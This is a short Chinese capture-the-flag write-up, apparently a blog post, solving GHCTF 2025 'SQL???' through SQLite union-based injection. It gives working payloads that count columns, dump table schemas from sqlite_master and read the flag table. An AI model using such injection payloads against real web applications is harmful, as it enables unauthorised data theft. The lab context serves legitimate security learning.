[GHCTF 2025]SQL???

打开题目在线环境:

先尝试注入:

id=1;show databases;

发现报错,后来看了wp才知道这个题目是SQLite注入。

我看的是这个师傅的wp:

https://blog.csdn.net/2401_86190146/article/details/146164505?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522b2e94c28c4b9713fffb8456c983de1b3%2522%252C%2522scm%2522%253A%252220140713.130102334...%2522%257D\&request_id=b2e94c28c4b9713fffb8456c983de1b3\&biz_id=0\&utm_medium=distribute.pc_search_result.none-task-blog-2~all~sobaiduend\~default-1-146164505-null-null.142^v102^pc_search_result_base9\&utm_term=[GHCTF 2025]SQL\&spm=1018.2226.3001.4187

1.先判断有几列

python 复制代码
? id=1 order by 6 #

到第六列时:

2.爆出来表名

python 复制代码
/?id=1 union select 1,2,3,4,group_concat(sql) from sqlite_master

所以我们要找的就是flag表里的flag列

直接payload:

python 复制代码
/?id=1 union select 1,2,3,4,flag from flag

在这里插入图片描述

相关推荐
YuTaoShao4 分钟前
【LeetCode 热题 100】51. N 皇后——回溯
java·算法·leetcode·职场和发展
null不是我干的23 分钟前
基于黑马教程——微服务架构解析(一)
java·微服务·架构
Bonnie_121527 分钟前
04-netty基础-Reactor三种模型
java·nio·jetty
懂得节能嘛.30 分钟前
【SpringAI实战】ChatPDF实现RAG知识库
java·后端·spring
探索java35 分钟前
Spring 解析 XML 配置文件的过程(从读取 XML 到生成 BeanDefinition)
xml·java·spring·xmlbeanfactory
wjs202436 分钟前
XML 语法详解
开发语言
双叶8361 小时前
(Python)文件储存的认识,文件路径(文件储存基础教程)(Windows系统文件路径)(基础教程)
开发语言·windows·python
半旧夜夏1 小时前
Bug猫学习史#1:面向对象
java
喜欢吃燃面1 小时前
C++:list(1)list的使用
开发语言·c++·学习
wenb1n1 小时前
【安全漏洞】隐藏在HTTP请求中的“隐形杀手”:Host头攻击漏洞深度剖析
java·后端